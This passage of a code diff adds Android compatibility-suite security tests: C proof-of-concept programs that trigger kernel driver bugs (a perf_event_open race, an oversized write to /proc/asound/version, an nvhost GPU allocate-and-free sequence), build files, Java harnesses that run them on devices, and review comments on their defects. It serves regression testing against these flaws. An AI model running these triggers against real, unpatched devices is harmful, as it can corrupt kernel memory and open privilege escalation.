+ * Type specific configuration information.
+ */
+ __u64 config;
+
+ union {
+ __u64 sample_period;
+ __u64 sample_freq;
+ };
+
+ __u64 sample_type;
+ __u64 read_format;
+
+ __u64 disabled : 1, /* off by default */
+ inherit : 1, /* children inherit it */
+ pinned : 1, /* must always be on PMU */
+ exclusive : 1, /* only group on PMU */
+ exclude_user : 1, /* don't count user */
+ exclude_kernel : 1, /* ditto kernel */
+ exclude_hv : 1, /* ditto hypervisor */
+ exclude_idle : 1, /* don't count when idle */
+ mmap : 1, /* include mmap data */
+ comm : 1, /* include comm data */
+ freq : 1, /* use freq, not period */
+ inherit_stat : 1, /* per task counts */
+ enable_on_exec : 1, /* next exec enables */
+ task : 1, /* trace fork/exit */
+ watermark : 1, /* wakeup_watermark */
+ /*
+ * precise_ip:
+ *
+ * 0 - SAMPLE_IP can have arbitrary skid
+ * 1 - SAMPLE_IP must have constant skid
+ * 2 - SAMPLE_IP requested to have 0 skid
+ * 3 - SAMPLE_IP must have 0 skid
+ *
+ * See also PERF_RECORD_MISC_EXACT_IP
+ */
+ precise_ip : 2, /* skid constraint */
+ mmap_data : 1, /* non-exec mmap data */
+ sample_id_all : 1, /* sample_type all events */
+
+ exclude_host : 1, /* don't count in host */
+ exclude_guest : 1, /* don't count in guest */
+
+ exclude_callchain_kernel : 1, /* exclude kernel callchains */
+ exclude_callchain_user : 1, /* exclude user callchains */
+ constraint_duplicate : 1,
+
+ __reserved_1 : 40;
+
+ union {
+ __u32 wakeup_events; /* wakeup every n events */
+ __u32 wakeup_watermark; /* bytes before wakeup */
+ };
+
+ __u32 bp_type;
+ union {
+ __u64 bp_addr;
+ __u64 config1; /* extension of config */
+ };
+ union {
+ __u64 bp_len;
+ __u64 config2; /* extension of config1 */
+ };
+ __u64 branch_sample_type; /* enum perf_branch_sample_type */
+
+ /*
+ * Defines set of user regs to dump on samples.
+ * See asm/perf_regs.h for details.
+ */
+ __u64 sample_regs_user;
+
+ /*
+ * Defines size of the user stack to dump on samples.
+ */
+ __u32 sample_stack_user;
+
+ /* Align to u64. */
+ __u32 __reserved_2;
+};
+
+
+#define PAIR_FD 1
+
+int group_fd[PAIR_FD],child_fd[PAIR_FD];
+
+long created = 0;
+long freed = 0;
+long finished = 0;
+
+void *thr(void *arg) {
+ printf("id=%d arg=%d\n",gettid(),arg);
+
+ int i;
+ struct perf_event_attr attr;
+
+ switch ((long)arg) {
+ case 0:
+ //#16123
+ printf("thread 0\n");
+ memset(&attr,0,sizeof(struct perf_event_attr));
+ attr.type = 1;
+ attr.size = sizeof(struct perf_event_attr);
+ attr.config = 1;
+
+ group_fd[0] = syscall(__NR_perf_event_open, &attr, 0x0ul, -1,
+ -1, 0x1ul, 0);
+
+ if(group_fd[0]<0){
+ perror("perf-group:");
+ }
+
+
+ memset(&attr,0,sizeof(struct perf_event_attr));
+ attr.type = 1;
+ attr.size = sizeof(struct perf_event_attr);
+ attr.config = 5;
+
+ child_fd[0] = syscall(__NR_perf_event_open, &attr,0x0ul, 0x6ul, group_fd[0], 0x0ul, 0);
+
+ if(group_fd[0]<0){
+ perror("perf-child:");
+ }
+
+ created = 1;
+ break;
+ case 1:
+
+ while(!created){
+ sleep(1);
+ }
+
+ printf("thread 1\n");
+ close(group_fd[0]);
+
+ freed = 1;
+
+ break;
+ case 2:
+
+ printf("thread 2\n");
+
+ while(!freed){
+ sleep(1);
+ }
+
+ close(child_fd[0]);
+
+ finished = 1;
+
+ break;
+
+ }
+ return 0;
+}
+
+int poc() {
+ long i;
+ pthread_t th[5];
+ for (i = 0; i < 3; i++) {
+ pthread_create(&th[i], 0, thr, (void *)i);
+ usleep(10000);
+ }
+
+ while(!finished){
+ sleep(1);
+ }
+
+ return 0;
+}
+
+
+int main(int argc, char const *argv[])
+{
+ int pid;
+ unsigned int times;
+ times = 0;
+ printf("POC3\n");
+ printf("Please enable CONFIG_SLUB_DEBUG_ON and check the posion overwriten message in kernel\n");
+ fflush(stdout);
+
+ // while(1){
+ pid = fork();
+ if(pid){
+ int status;
+ int ret = waitpid(pid,&status,0);
+
+ printf("[%d]times.\r",times);
+ times++;
+ }else
+ return poc();
+ // }
+ return 0;
+}
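Review bot: The second error check in `thr` case 0 tests the wrong descriptor: after assigning `child_fd[0]` it repeats `if(group_fd[0]<0)`, so a failed child `perf_event_open` is never reported and the log looks the same as a run that reached the code under test. It should read `if(child_fd[0]<0){`. In the same function `printf("id=%d arg=%d\n",gettid(),arg)` passes a `void *` for `%d`; `(long)arg` with `%ld` matches the cast already used in the `switch`. The threads are never joined and `created`/`freed`/`finished` are plain `long`s shared between them without synchronisation, which deserves a comment if it is intentional.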
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk
new file mode 100644
index 0000000..9e30d30
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0404/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0404
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c
new file mode 100644
index 0000000..54821ef
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0404/poc.c
@@ -0,0 +1,49 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#include <string.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <unistd.h>
+#include <sys/prctl.h>
+#include <sys/syscall.h>
+#include <sys/types.h>
+#include <pthread.h>
+#include <fcntl.h>
+#include <sys/stat.h>
+#include <semaphore.h>
+#include <sys/socket.h>
+#include <sys/mman.h>
+#include <signal.h>
+#include <sys/wait.h>
+#include <sys/ioctl.h>
+#include <sys/utsname.h>
+#include <sys/ptrace.h>
+
+char buf[4096];
+
+int main(int argc, char const *argv[]){
+ memset(buf, 0xa0, sizeof(buf));
+
+ int fd = open("/proc/asound/version", O_RDWR);
+ if(fd != -1){
+ lseek(fd, 0x1234567800000000, SEEK_SET);
+ write(fd, buf, sizeof(buf));
+ }else{
+ perror("open error\n");
+ }
+ close(fd);
+ return 0;
+}
\ No newline at end of file
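Review bot: `close(fd)` runs on the failure path too, so when `open` fails the program calls `close(-1)`; moving the call inside the `if(fd != -1)` branch avoids that. The results of `lseek` and `write` are discarded, so the output cannot distinguish a run that reached the write from one where the seek was rejected; printing them, or calling `perror` on failure, would make the CTS log usable for triage. `perror("open error\n")` puts the newline before the errno text, and `perror("open")` reads better.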
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk b/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk
new file mode 100644
index 0000000..afb77b4
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0429/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2017-0429
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c b/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c
new file mode 100644
index 0000000..4ef1b3e
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2017-0429/poc.c
@@ -0,0 +1,179 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <stdlib.h>
+#include <pthread.h>
+#include <sys/ioctl.h>
+#include <sys/mman.h>
+#include <errno.h>
+#include <sys/stat.h>
+#include <fcntl.h>
+#include <sched.h>
+#include <sys/types.h>
+#include <signal.h>
+#include <unistd.h>
+// for syscall
+#include <sys/syscall.h>
+// for futex
+#include <linux/futex.h>
+#include <sys/time.h>
+
+#define LOG(fmt, ...) printf(fmt "\n", ##__VA_ARGS__)
+#define ERR(fmt, ...) printf(fmt ": %d(%d)\n", ##__VA_ARGS__, errno, errno)
+#define ARRAY_SIZE(a) (sizeof(a) / sizeof((a)[0]))
+
+#define NVMAP_IOC_MAGIC 'N'
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+
+static int set_affinity(int num)
+{
+ int ret = 0;
+ cpu_set_t mask;
+ CPU_ZERO(&mask);
+ CPU_SET(num, &mask);
+ ret = sched_setaffinity(0, sizeof(cpu_set_t), &mask);
+ return ret;
+}
+
+#define SZ_128K 0x00020000
+#define NVHOST_AS_IOCTL_MAGIC 'A'
+struct nvhost_as_bind_channel_args {
+ __u32 channel_fd; /* in */
+} __packed;
+#define NVHOST_AS_IOCTL_BIND_CHANNEL \
+ _IOWR(NVHOST_AS_IOCTL_MAGIC, 1, struct nvhost_as_bind_channel_args)
+
+struct nvhost_as_free_space_args {
+ __u64 offset; /* in, byte address */
+ __u32 pages; /* in, pages */
+ __u32 page_size; /* in, bytes */
+};
+#define NVHOST_AS_IOCTL_FREE_SPACE \
+ _IOWR(NVHOST_AS_IOCTL_MAGIC, 3, struct nvhost_as_free_space_args)
+
+#define NVHOST_AS_ALLOC_SPACE_FLAGS_SPARSE 0x2
+struct nvhost_as_alloc_space_args {
+ __u32 pages; /* in, pages */
+ __u32 page_size; /* in, bytes */
+ __u32 flags; /* in */
+ __u32 padding; /* in */
+ union {
+ __u64 offset; /* inout, byte address valid iff _FIXED_OFFSET */
+ __u64 align; /* in, alignment multiple (0:={1 or n/a}) */
+ } o_a;
+};
+#define NVHOST_AS_IOCTL_ALLOC_SPACE \
+ _IOWR(NVHOST_AS_IOCTL_MAGIC, 6, struct nvhost_as_alloc_space_args)
+
+#define CLOSE_THREAD_NUM 1
+#define TRY_TIMES 2
+#define NVMAPDEV "/dev/nvmap"
+#define GPUDEV "/dev/nvhost-gpu"
+#define ASDEV "/dev/nvhost-as-gpu"
+pthread_t close_thread_id[CLOSE_THREAD_NUM] = { 0 };
+int nvmap, gpu, asgpu;
+volatile int attack;
+
+int main(void)
+{
+ int i, j, ret;
+ int dma1, dma2;
+ struct nvmap_create_handle args = {
+ .size = PAGE_SIZE
+ };
+ struct nvhost_as_bind_channel_args as_bind = { 0 };
+ struct nvhost_as_alloc_space_args alloc = {
+ .pages = 1,
+ .page_size = SZ_128K,
+ .flags = NVHOST_AS_ALLOC_SPACE_FLAGS_SPARSE
+ };
+ struct nvhost_as_free_space_args free_arg = {
+ .pages = 1,
+ .page_size = SZ_128K
+ };
+
+ /* bind_cpu */
+ set_affinity(0);
+
+ nvmap = open(NVMAPDEV, O_RDONLY);
+ if(nvmap == -1) {
+ ERR("[-] open %s failed", NVMAPDEV);
+ goto __cleanup;
+ }
+ gpu = open(GPUDEV, O_RDONLY);
+ if(gpu == -1) {
+ ERR("[-] open %s failed", GPUDEV);
+ goto __cleanup;
+ }
+ asgpu = open(ASDEV, O_RDONLY);
+ if(asgpu == -1) {
+ ERR("[-] open %s failed", ASDEV);
+ goto __cleanup;
+ }
+ // bind the channel
+ as_bind.channel_fd = gpu;
+ ret = ioctl(asgpu, NVHOST_AS_IOCTL_BIND_CHANNEL, &as_bind);
+ if(ret == -1) {
+ ERR("[-] NVHOST_AS_IOCTL_BIND_CHANNEL failed");
+ goto __cleanup;
+ } else {
+ //LOG("[+] ioctl OK, channel is bond");
+ }
+
+ #if 1
+ // prepare
+ ret = ioctl(nvmap, NVMAP_IOC_CREATE, &args);
+ if(ret) {
+ ERR("[-] NVMAP_IOC_CREATE failed");
+ goto __cleanup;
+ }
+ #endif
+
+ ret = ioctl(asgpu, NVHOST_AS_IOCTL_ALLOC_SPACE, &alloc);
+ if(ret) {
+ ERR("[-] NVHOST_AS_IOCTL_ALLOC_SPACE failed");
+ goto __cleanup;
+ }
+ free_arg.offset = alloc.o_a.offset;
+ ret = ioctl(asgpu, NVHOST_AS_IOCTL_FREE_SPACE, &free_arg);
+ if(ret) {
+ ERR("[-] NVHOST_AS_IOCTL_FREE_SPACE failed");
+ goto __cleanup;
+ }
+
+__cleanup:
+ close(nvmap);
+ close(gpu);
+ close(asgpu);
+ return 0;
+}
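Review bot: On an early failure the `__cleanup` label closes descriptors that were never opened: `nvmap`, `gpu` and `asgpu` are zero-initialised globals, so if `open(NVMAPDEV, ...)` fails, `close(gpu)` and `close(asgpu)` both act on fd 0 and `close(nvmap)` receives -1. Declaring `int nvmap = -1, gpu = -1, asgpu = -1;` and guarding each call, for example `if (gpu >= 0) close(gpu);`, fixes it. The `ERR` macro prints `errno` twice (`%d(%d)`); `strerror(errno)` was probably intended for one of the two. `i`, `j`, `dma1`, `dma2`, `attack` and `close_thread_id` are unused in this file and can go.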
diff --git a/hostsidetests/security/src/android/cts/security/FileSystemPermissionTest.java b/hostsidetests/security/src/android/cts/security/FileSystemPermissionTest.java
index 0cbd1cc..f4ce1bd 100644
--- a/hostsidetests/security/src/android/cts/security/FileSystemPermissionTest.java
+++ b/hostsidetests/security/src/android/cts/security/FileSystemPermissionTest.java
@@ -73,6 +73,7 @@
"/dev/nvhost-prof-gpu",
"/dev/nvhost-vic",
"/dev/nvmap", // b/9088251
+ "/dev/pmsg0", // b/31857082
"/dev/ptmx", // b/9088251
"/dev/pvrsrvkm", // b/9108170
"/dev/pvr_sync",
diff --git a/hostsidetests/security/src/android/security/cts/AdbUtils.java b/hostsidetests/security/src/android/security/cts/AdbUtils.java
index a3018fa..fa9934f 100644
--- a/hostsidetests/security/src/android/security/cts/AdbUtils.java
+++ b/hostsidetests/security/src/android/security/cts/AdbUtils.java
@@ -30,6 +30,7 @@
import java.io.InputStream;
import java.io.OutputStream;
import java.util.Scanner;
+import java.util.concurrent.TimeUnit;
public class AdbUtils {
@@ -39,8 +40,7 @@
* @param device device for the command to be ran on
* @return the console output from running the command
*/
- public static String runCommandLine(String command, ITestDevice device) throws Exception
- {
+ public static String runCommandLine(String command, ITestDevice device) throws Exception {
return device.executeShellCommand(command);
}
@@ -51,17 +51,25 @@
* @param device device to be ran on
* @return the console output from the binary
*/
- public static String runPoc(String pathToPoc, ITestDevice device) throws Exception {
- String fullResourceName = pathToPoc;
- File pocFile = File.createTempFile("poc", "");
- try {
- pocFile = extractResource(fullResourceName, pocFile);
- device.pushFile(pocFile, "/data/local/tmp/poc");
- device.executeShellCommand("chmod +x /data/local/tmp/poc");
- return device.executeShellCommand("/data/local/tmp/poc");
- } finally {
- pocFile.delete();
- }
+ public static String runPoc(String pocName, ITestDevice device) throws Exception {
+ device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
+ return device.executeShellCommand("/data/local/tmp/" + pocName);
+ }
+
+ /**
+ * Pushes and runs a binary to the selected device
+ *
+ * @param pathToPoc a string path to poc from the /res folder
+ * @param device device to be ran on
+ * @param timeout time to wait for output in seconds
+ * @return the console output from the binary
+ */
+ public static String runPoc(String pocName, ITestDevice device, int timeout) throws Exception {
+ device.executeShellCommand("chmod +x /data/local/tmp/" + pocName);
+ CollectingOutputReceiver receiver = new CollectingOutputReceiver();
+ device.executeShellCommand("/data/local/tmp/" + pocName, receiver, timeout, TimeUnit.SECONDS, 0);
+ String output = receiver.getOutput();
+ return output;
}
/**
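Review bot: The Javadoc on the new three-argument `runPoc` still says "Pushes and runs a binary" and documents `@param pathToPoc`, but the parameter is `pocName` and neither overload pushes anything any more; both assume the binary is already in `/data/local/tmp/`. Suggested wording: `@param pocName file name of a PoC binary already present in /data/local/tmp`. Nothing here checks that the file exists, so a missing binary only shows up as shell error text in the returned string, which the callers added in this commit mostly ignore, and a test can pass without running its PoC. A presence check that fails the test would close that gap, and the two overloads could share the repeated `chmod` line.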
diff --git a/hostsidetests/security/src/android/security/cts/Poc16_10.java b/hostsidetests/security/src/android/security/cts/Poc16_10.java
new file mode 100644
index 0000000..d04ebea
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc16_10.java
@@ -0,0 +1,107 @@
+/**
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.CollectingOutputReceiver;
+import com.android.tradefed.device.DeviceNotAvailableException;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceTestCase;
+
+import android.platform.test.annotations.RootPermissionTest;
+import android.platform.test.annotations.SecurityTest;
+
+import java.io.BufferedOutputStream;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.util.Scanner;
+
+@SecurityTest
+public class Poc16_10 extends SecurityTestCase {
+
+ /**
+ * b/30904789
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6730() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6730", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906023
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6731() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6731", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906599
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6732() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6732", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30906694
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6733() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6733", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30907120
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6734() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6734", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30907701
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6735() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6735", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/30953284
+ */
+ @SecurityTest
+ public void testPocCVE_2016_6736() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-6736", getDevice(), 60);
+ }
+ }
+}
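Review bot: Of the imports in this new file only `android.platform.test.annotations.SecurityTest` is used; the tradefed, `RootPermissionTest`, `java.io` and `java.util.Scanner` imports can be dropped (Poc16_12.java carries the same unused list). The seven tests differ only in the CVE name, so a private helper such as `runIfDriverPresent(String driver, String poc)` would remove the repetition. Each test returns silently when `/dev/dri/renderD129` is absent, so a skipped test is reported as a pass; a log line or a class comment saying this is intended would help whoever reads the results.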
diff --git a/hostsidetests/security/src/android/security/cts/Poc16_12.java b/hostsidetests/security/src/android/security/cts/Poc16_12.java
new file mode 100644
index 0000000..a6160d5
--- /dev/null
+++ b/hostsidetests/security/src/android/security/cts/Poc16_12.java
@@ -0,0 +1,258 @@
+/**
+0;256;0c * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+
+package android.security.cts;
+
+import com.android.tradefed.device.CollectingOutputReceiver;
+import com.android.tradefed.device.DeviceNotAvailableException;
+import com.android.tradefed.device.ITestDevice;
+import com.android.tradefed.testtype.DeviceTestCase;
+
+import android.platform.test.annotations.RootPermissionTest;
+import android.platform.test.annotations.SecurityTest;
+
+import java.io.BufferedOutputStream;
+import java.io.File;
+import java.io.FileOutputStream;
+import java.io.IOException;
+import java.io.InputStream;
+import java.io.OutputStream;
+import java.util.Scanner;
+
+@SecurityTest
+public class Poc16_12 extends SecurityTestCase {
+
+ //Criticals
+ /**
+ * b/31606947
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8424() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8424", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31797770
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8425() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
+ AdbUtils.runPoc("CVE-2016-8425", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31799206
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8426() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-gpu")) {
+ AdbUtils.runPoc("CVE-2016-8426", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31799885
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8427() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-gpu") ||
+ containsDriver(getDevice(), "/dev/nvhost-dbg-gpu")) {
+ AdbUtils.runPoc("CVE-2016-8427", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31993456
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8428() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8428", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32160775
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8429() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ AdbUtils.runPoc("CVE-2016-8429", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32225180
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8430() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvhost-vic")) {
+ AdbUtils.runPoc("CVE-2016-8430", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32402179
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8431() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8431", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32447738
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8432() throws Exception {
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8432", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32125137
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8434() throws Exception {
+ if(containsDriver(getDevice(), "/dev/kgsl-3d0")) {
+ AdbUtils.runPoc("CVE-2016-8434", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32700935
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8435() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/dri/renderD129")) {
+ AdbUtils.runPoc("CVE-2016-8435", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31568617
+ */
+ @SecurityTest
+ public void testPocCVE_2016_9120() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/ion")) {
+ AdbUtils.runPoc("CVE-2016-9120", getDevice(), 60);
+ }
+ }
+
+ //Highs
+ /**
+ * b/31225246
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8412() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/v4l-subdev7")) {
+ AdbUtils.runPoc("CVE-2016-8412", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31243641
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8444() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/v4l-subdev17")) {
+ AdbUtils.runPoc("CVE-2016-8444", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31791148
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8448() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/graphics/fb0")) {
+ AdbUtils.runPoc("CVE-2016-8448", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31798848
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8449() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/dev/tegra_avpchannel")) {
+ AdbUtils.runPoc("CVE-2016-8449", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/31668540
+ */
+ @SecurityTest
+ public void testPocCVE_2016_8460() throws Exception {
+ if(containsDriver(getDevice(), "/dev/nvmap")) {
+ String result = AdbUtils.runPoc("CVE-2016-8460", getDevice(), 60);
+ assertTrue(!result.equals("Vulnerable"));
+ }
+ }
+
+ /**
+ * b/32402548
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0403() throws Exception {
+ enableAdbRoot(getDevice());
+ AdbUtils.runPoc("CVE-2017-0403", getDevice(), 60);
+ }
+
+ /**
+ * b/32510733
+ */
+ @SecurityTest
+ public void testPocCVE_2017_0404() throws Exception {
+ enableAdbRoot(getDevice());
+ if(containsDriver(getDevice(), "/proc/asound/version")) {
+ AdbUtils.runPoc("CVE-2017-0404", getDevice(), 60);
+ }
+ }
+
+ /**
+ * b/32178033
+ */
+ @SecurityTest
